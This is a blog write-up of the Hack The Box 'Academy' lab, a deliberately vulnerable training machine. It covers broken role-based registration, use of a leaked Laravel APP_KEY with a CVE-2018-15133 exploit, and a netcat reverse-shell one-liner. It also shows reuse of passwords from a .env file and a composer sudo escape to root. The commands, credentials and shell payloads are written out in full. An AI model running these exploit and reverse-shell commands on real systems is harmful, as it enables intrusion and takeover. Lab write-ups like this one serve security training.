<!DOCTYPE html>



<html lang="en-US" 
  
    mode="dark"
  
>

  <!--
  The Head
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  

    

    

  

  <!-- Begin Jekyll SEO tag v2.7.1 -->
<meta name="generator" content="Jekyll v4.2.0" />
<meta property="og:title" content="Hack The Box - Academy" />
<meta property="og:locale" content="en_US" />
<link rel="canonical" href="https://unknown11001.github.io/blog/posts/academy/" />
<meta property="og:url" content="https://unknown11001.github.io/blog/posts/academy/" />
<meta property="og:site_name" content="Unknown101.io" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-04-21T00:00:00+07:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Hack The Box - Academy" />
<meta name="twitter:site" content="@ryanapriyudan" />
<meta name="google-site-verification" content="google_meta_tag_verification" />
<script type="application/ld+json">
{"@type":"BlogPosting","url":"https://unknown11001.github.io/blog/posts/academy/","headline":"Hack The Box - Academy","dateModified":"2021-04-30T11:32:14+07:00","datePublished":"2021-04-21T00:00:00+07:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://unknown11001.github.io/blog/posts/academy/"},"@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->


  <title>Hack The Box - Academy | Unknown101.io
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://www.favicon-generator.org/
-->



<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">
<link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">

<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png">
<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png">
<link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png">

<link rel="icon" type="image/png" sizes="192x192"  href="/assets/img/favicons/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

<link rel="manifest" href="/assets/img/favicons/manifest.json">
<meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'>
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">


  <!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
  <link rel="dns-prefetch" href="https://fonts.gstatic.com">

  <!-- GA -->
  

  <!-- jsDelivr CDN -->
  <link rel="preconnect" href="https://cdn.jsdelivr.net">
  <link rel="dns-prefetch" href="https://cdn.jsdelivr.net">

  <!-- Bootstrap -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css">

  <!--
  CSS selector for site.
-->

<link rel="stylesheet" href="/assets/css/style.css">


  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css">



  <!-- JavaScripts -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>

  <script defer
    src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script>

  <!--
  JS selector for site.
-->


  





<script defer src="/assets/js/dist/post.min.js"></script>






</head>


  <body data-spy="scroll" data-target="#toc">

    <!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end">

  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/" alt="avatar" class="mx-auto">
        
        <img src="/assets/img/avatar1.png" alt="avatar" onerror="this.style.display='none'">
      </a>
    </div>

    <div class="site-title mt-3">
      <a href="/">unknown101</a>
    </div>

    <div class="site-subtitle font-italic">TryHackMe, HackTheBox Player  TryHarder!</div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100">
    <!-- home -->
    <li class="nav-item">
      <a href="/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs -->
    
    <li class="nav-item">
      <a href="/cheatsheet/" class="nav-link">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i>
        <span>CHEATSHEET</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/tags/" class="nav-link">
        <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i>
        <span>TAGS</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        <span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/categories/" class="nav-link">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i>
        <span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/about/" class="nav-link">
        <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i>
        <span>ABOUT</span>
      </a>
    </li> <!-- .nav-item -->
    

  </ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center">

    
      

      
      <a href="https://www.hackthebox.eu/profile/247693" aria-label="hackthebox"
        
        target="_blank" rel="noopener">
        <i class="fas fa-cube"></i>
      </a>
      

    
      

      
      <a href="https://github.com/Bunnys666" aria-label="github"
        
        target="_blank" rel="noopener">
        <i class="fab fa-github"></i>
      </a>
      

    
      

      
      <a href="https://twitter.com/ryanapriyudan" aria-label="twitter"
        
        target="_blank" rel="noopener">
        <i class="fab fa-twitter"></i>
      </a>
      

    
      

      
      <a href="
          javascript:location.href = 'mailto:' + ['muhammadryanapriyudan','gmail.com'].join('@')" aria-label="email"
        
        >
        <i class="fas fa-envelope"></i>
      </a>
      

    
      

      
      <a href="/feed.xml" aria-label="rss"
        
        >
        <i class="fas fa-rss"></i>
      </a>
      

    

    

  </div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->


    <!--
  The Top Bar
-->

<div id="topbar-wrapper" class="row justify-content-center topbar-down">
  <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
    <span id="breadcrumb">

    

    

      

        
          

        

      

        
        <span>
          
          
          <a href="/">
            Posts
          </a>
        </span>

        

      

        
          <span>Hack The Box - Academy</span>

        

      

    

    </span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">
      Post
    </div>

    <i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="Search...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>
    </span>
    <span id="search-cancel" >Cancel</span>
  </div>

</div>


    <div id="main-wrapper">
      <div id="main">

        <!--
  Refactor the HTML structure.
-->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->


<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->


<!-- Add attribute 'hide-bullet' to the checkbox list -->




  

  

  <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->
  
  

  

  



<!-- return -->
<div class="row">

  <div id="post-wrapper" class="col-12 col-lg-11 col-xl-8">

    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

      <h1 data-toc-skip>Hack The Box - Academy</h1>

      <div class="post-meta text-muted d-flex flex-column">
        <!-- Published date and author -->
        <div>
          <span class="semi-bold">
            
          </span>
          Posted
          <!--
  Date format snippet
  See: /assets/js/_utils/timeage.js
-->





<span class="timeago "
  
    data-toggle="tooltip"
    data-placement="bottom"
    title="Wed, Apr 21, 2021, 12:00 AM +0700"
  

  
  prep="on" >

  
  

  
    Apr 21
  

  <i class="unloaded">2021-04-21T00:00:00+07:00</i>

</span>
 by unknown1010
        </div>

        <div>
          <!-- lastmod -->
          
          <span>
            <!--
  Date format snippet
  See: /assets/js/_utils/timeage.js
-->





<span class="timeago lastmod"
  
    data-toggle="tooltip"
    data-placement="bottom"
    title="Fri, Apr 30, 2021, 11:32 AM +0700"
  

  prefix="Updated "
   >

  
  

  
    Apr 30
  

  <i class="unloaded">2021-04-30T11:32:14+07:00</i>

</span>

          </span>
          

          <!-- read time -->
          <!--
  Calculate the post's reading time, and display the word count in tooltip
 -->


<!-- words per minute  -->







<!-- return element -->
<!-- 
<span class="readtime" data-toggle="tooltip" data-placement="bottom" title="510 words">2 min</span> -->


          <!-- page views -->
          

        </div>

      </div> <!-- .post-meta -->

      <div class="post-content">

        

        <p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/cover.png" alt="" /></p>

<h2 id="portscan">Portscan</h2>
<hr />

<div class="language-sql highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre><span class="n">PORT</span>      <span class="k">STATE</span> <span class="n">SERVICE</span> <span class="k">VERSION</span>
<span class="mi">22</span><span class="o">/</span><span class="n">tcp</span>    <span class="k">open</span>  <span class="n">ssh</span>     <span class="n">OpenSSH</span> <span class="mi">8</span><span class="p">.</span><span class="mi">2</span><span class="n">p1</span> <span class="n">Ubuntu</span> <span class="mi">4</span><span class="n">ubuntu0</span><span class="p">.</span><span class="mi">1</span> <span class="p">(</span><span class="n">Ubuntu</span> <span class="n">Linux</span><span class="p">;</span> <span class="n">protocol</span> <span class="mi">2</span><span class="p">.</span><span class="mi">0</span><span class="p">)</span>
<span class="mi">80</span><span class="o">/</span><span class="n">tcp</span>    <span class="k">open</span>  <span class="n">http</span><span class="o">?</span>
<span class="mi">33060</span><span class="o">/</span><span class="n">tcp</span> <span class="k">open</span>  <span class="n">mysqlx</span><span class="o">?</span>
<span class="o">|</span> <span class="n">fingerprint</span><span class="o">-</span><span class="n">strings</span><span class="p">:</span> 
<span class="o">|</span>   <span class="n">DNSStatusRequestTCP</span><span class="p">,</span> <span class="n">LDAPSearchReq</span><span class="p">,</span> <span class="n">NotesRPC</span><span class="p">,</span> <span class="n">SSLSessionReq</span><span class="p">,</span> <span class="n">TLSSessionReq</span><span class="p">,</span> <span class="n">X11Probe</span><span class="p">,</span> <span class="n">afp</span><span class="p">:</span> 
<span class="o">|</span>     <span class="n">Invalid</span> <span class="n">message</span><span class="nv">"
|_    HY000
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></pre></td></tr></tbody></table></code></div></div>

<h2 id="reconaissance">Reconaissance</h2>
<hr />
<p>like usual im gonna use whatweb command for definition a site</p>

<blockquote>
  <p>whatweb http://$ip</p>
</blockquote>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>http://10.10.10.215 [302 Found] Apache[2.4.41], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.215], RedirectLocation[http://academy.htb/]
http://academy.htb/ [302 Found] Country[INDONESIA][ID], HTTPServer[BigIP], IP[36.86.63.182], RedirectLocation[http://mercusuar.uzone.id]
http://mercusuar.uzone.id [200 OK] Bootstrap, Country[INDONESIA][ID], Frame, HTML5, HTTPServer[nginx], IP[36.86.63.180], JQuery[2.2.4], PHP[5.6.40], Script[text/javascript], Title[Mercusuar], UncommonHeaders[x-content-type-options], X-Frame-Options[DENY], X-Powered-By[PHP/5.6.40], X-XSS-Protection[1; mode=block], YouTube, nginx
</pre></td></tr></tbody></table></code></div></div>

<p>as you can see we got new domain, added into host file then access it.</p>

<blockquote>
  <p>http://academy.htb/</p>
</blockquote>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/1.png" alt="" /></p>

<p>found login.php and register.php</p>

<blockquote>
  <p>http://academy.htb/login.php</p>
</blockquote>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/2.png" alt="" /></p>

<blockquote>
  <p>http://academy.htb/register.php</p>
</blockquote>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/3.png" alt="" /></p>

<p>tried register and login with my account</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>unknown:1
</pre></td></tr></tbody></table></code></div></div>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/4.png" alt="" /></p>

<p>as you can see i able to login, but that is something wronng im not login as unkwon but egre55 as creator.</p>

<p>im gonna doing scanning directory for finding something important using dirb.</p>

<blockquote>
  <p>dirb http://academy.htb/</p>
</blockquote>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/9.png" alt="" /></p>

<p>i found admin.php for admin panel, the mystakes is on register page.</p>

<p>here’s my assumtion this site using role like if role = 0 you can register as user but if you register role = 1 you can login as admin.
it’s clearly when im check the source code on register.php</p>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/5.png" alt="" /></p>

<p>so im back again on register.php for register as admin with role 1, you doing this with burpsuite or developer tools then login on admin page as admin with password 1</p>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/6.png" alt="" /></p>

<blockquote>
  <p>http://academy.htb/admin-page.php</p>
</blockquote>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/7.png" alt="" /></p>

<p>as you can see i logged as admin! YAY!</p>

<p>now i’ve got new subdomain again , added into host file</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>Fix issue with dev-staging-01.academy.htb
</pre></td></tr></tbody></table></code></div></div>

<blockquote>
  <p>http://dev-staging-01.academy.htb/</p>
</blockquote>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/8.png" alt="" /></p>

<p>this site based on laravel XD… similiar error</p>

<p>this error telling us crutial information</p>

<div class="language-php highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre><span class="no">APP_NAME</span> 	
<span class="s2">"Laravel"</span>

<span class="no">APP_ENV</span> 	
<span class="s2">"local"</span>

<span class="no">APP_KEY</span> 	
<span class="s2">"base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="</span>
</pre></td></tr></tbody></table></code></div></div>

<p>im googling about this APP key for laravel and found this <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15133">CVE-2018-15133</a> and poc code in <a href="https://github.com/aljavier/exploit_laravel_cve-2018-15133">here</a></p>

<p>we can easily to exploit as long as we have app key</p>

<p><code class="language-plaintext highlighter-rouge"><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>python3 pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c pwd
</pre></td></tr></tbody></table></code></p>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/10.png" alt="" /></p>

<p>nice RCE , now it’s time to revershell</p>

<p><code class="language-plaintext highlighter-rouge"><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>python3 pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.128 9000 &gt;/tmp/f'
</pre></td></tr></tbody></table></code></p>

<p>and start listner</p>

<p><code class="language-plaintext highlighter-rouge"><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>rlwrap nc -lnvp 9000
</pre></td></tr></tbody></table></code></p>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/11.png" alt="" /></p>

<p>upgrade shell with following command :</p>

<div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">python3</span> <span class="o">-</span><span class="n">c</span> <span class="s">'import pty; pty.spawn("/bin/bash")'</span>
</pre></td></tr></tbody></table></code></div></div>

<p>i found user.txt on dir /home/cry0l1t3, for password carolite i found that in /var/www/html/academy/.env this file contains information about the site.</p>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/13.png" alt="" /></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>mySup3rP4s5w0rd!!
</pre></td></tr></tbody></table></code></div></div>

<p>login via ssh for stable shell and grab user.txt</p>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/15.png" alt="" /></p>

<p>there is no sudo -l command with this user, and already check the os using command lsb_release with newest os until linpeas.sh show me the way</p>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/16.png" alt="" /></p>

<p><code class="language-plaintext highlighter-rouge"><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>su mrb3n:mrb3n_Ac@d3my!
</pre></td></tr></tbody></table></code></p>

<h2 id="privilege-escalation">Privilege Escalation</h2>
<hr />
<p>for mrb3n user we can run command sudo -l for gain root access</p>

<p><code class="language-plaintext highlighter-rouge"><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>sudo -l
</pre></td></tr></tbody></table></code></p>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/17.png" alt="" /></p>

<p>we can take advantages of composer, execute this command below will lead you into root.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="nv">TF</span><span class="o">=</span><span class="si">$(</span><span class="nb">mktemp</span> <span class="nt">-d</span><span class="si">)</span>
<span class="nb">echo</span> <span class="s1">'{"scripts":{"x":"/bin/sh -i 0&lt;&amp;3 1&gt;&amp;3 2&gt;&amp;3"}}'</span> <span class="o">&gt;</span><span class="nv">$TF</span>/composer.json
<span class="nb">sudo </span>composer <span class="nt">--working-dir</span><span class="o">=</span><span class="nv">$TF</span> run-script x
</pre></td></tr></tbody></table></code></div></div>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/18.png" alt="" /></p>

<p>and grab our root.txt</p>

<p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/Academy/19.png" alt="" /></p>

<h3 id="referencess">Referencess</h3>

<div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="gp">https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#</span>bash-tcp
<span class="go">https://netsec.ws/?p=337
https://gtfobins.github.io/gtfobins/composer/
</span></pre></td></tr></tbody></table></code></div></div>

        <br>
        <p>I would like to say thankyou for read my <b>write up</b>, if you enjoy this <b>write up</b> you can support me with click button below to Get my-OSCP-cert.</p>
        <p>Thankyou!</p>
        <a href="https://buymeacoffe.com/unknown1010"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/red-button.png" alt="" style="width: 250px;"></a>
      </div>

      <div class="post-tail-wrapper text-muted">

        <!-- categories -->
        
        <div class="post-meta mb-3">
          <i class="far fa-folder-open fa-fw mr-1"></i>
          
            <a href='/categories/laravel/'>Laravel</a>,
            <a href='/categories/broken-authentication/'>Broken Authentication</a>,
            <a href='/categories/cve-2018-15133/'>cve-2018-15133</a>,
            <a href='/categories/composer/'>Composer</a>
        </div>
        
        

        <!-- tags -->
        
        <div class="post-tags">
          <i class="fa fa-tags fa-fw mr-1"></i>
          
          <a href="/tags/hackthebox/"
            class="post-tag no-text-decoration" >Hackthebox</a>
          
          <a href="/tags/infosec/"
            class="post-tag no-text-decoration" >Infosec</a>
          
          <a href="/tags/linux/"
            class="post-tag no-text-decoration" >Linux</a>
          
          
          </div>
        

      <!-- .post-tail-bottom -->

      </div><!-- div.post-tail -->

    </div> <!-- .post -->

  </div> <!-- #post-wrapper -->
  
  

  

  <!--
  The Pannel on right side (Desktop views)
-->

<div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down">

  <div class="access">

  














  

    <div id="access-lastmod" class="post">
      <span>Recent Update</span>
      <ul class="post-content pl-0 pb-1 ml-1 mt-2">

      
        
        
        
        <li><a href="/posts/academy/">Hack The Box - Academy</a></li>
      

      </ul>
    </div> <!-- #access-lastmod -->

  

  















  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  
    <div id="access-tags">
      <span>Trending Tags</span>
      <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

      
        
        <a class="post-tag" href="/tags/hackthebox/">Hackthebox</a>
      
        
        <a class="post-tag" href="/tags/infosec/">Infosec</a>
      
        
        <a class="post-tag" href="/tags/linux/">Linux</a>
      

      </div>
    </div>
  
  </div> <!-- .access -->

  
    <!-- BS-toc.js will be loaded at medium priority -->
    <script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script>
    <div id="toc-wrapper" class="pl-0 pr-4 mb-5">
      <span class="pl-3 pt-2 mb-2">Contents</span>
      <nav id="toc" data-toggle="toc"></nav>
    </div>
  

</div> <!-- #panel-wrapper -->

</div> <!-- .row -->

<div class="row">
  <div class="col-12 col-lg-11 col-xl-8">
    <div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

    <!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.
-->

<!-- The total size of related posts  -->


<!-- An random integer that bigger than 0  -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy}  -->








  

  
    






<!-- Fill with the other newlest posts  -->




  
    
    
  







    <!--
  Navigation buttons at the bottom of the post.
-->

<div class="post-navigation d-flex justify-content-between">
  
  <span class="btn btn-outline-primary disabled"
    prompt="Older">
    <p>-</p>
  </span>
  

  
  <span class="btn btn-outline-primary disabled"
    prompt="Newer">
    <p>-</p>
  </span>
  

</div>


    
      
    </div> <!-- #post-extend-wrapper -->

  </div> <!-- .col-* -->

</div> <!-- .row -->

<link rel="stylesheet" href="/_site/assets/css/style.css">


  <!--
  image lazy load: https://github.com/ApoorvSaxena/lozad.js
-->
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script>

<script type="text/javascript">
  const imgs = document.querySelectorAll('#main > div.row:first-child > div:first-child img');
  const observer = lozad(imgs);
  observer.observe();
</script>




        <!--
  The Footer
-->

<footer class="d-flex w-100 justify-content-center">
  <div class="d-flex justify-content-between align-items-center">
    <div class="footer-left">
      <p class="mb-0">
        <p class="mb-0" style="font-size: 14px;">
          © 2021
          <a href="https://twitter.com/username"></a>.
          
          <span data-toggle="tooltip" data-placement="top"
            title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">unknown101</span>
          
        </p>
      </p>
    </div>   
  </div> <!-- div.d-flex -->
</footer>


      </div>

      <!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints">
      <h4 class="text-muted mb-4">Trending Tags</h4>

      















  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



      
        
        <a class="post-tag" href="/tags/hackthebox/">Hackthebox</a>
      
        
        <a class="post-tag" href="/tags/infosec/">Infosec</a>
      
        
        <a class="post-tag" href="/tags/linux/">Linux</a>
      

    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>


    </div> <!-- #main-wrapper -->

    

    <div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a>

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="https://unknown11001.github.io/blog{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    {categories}    {tags}  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No result founds.</p>',
  templateMiddleware: function(prop, value, template) {
    if (prop === 'categories') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
      }
    }

    if (prop === 'tags') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
      }
    }
  }
});
</script>


  </body>

</html>

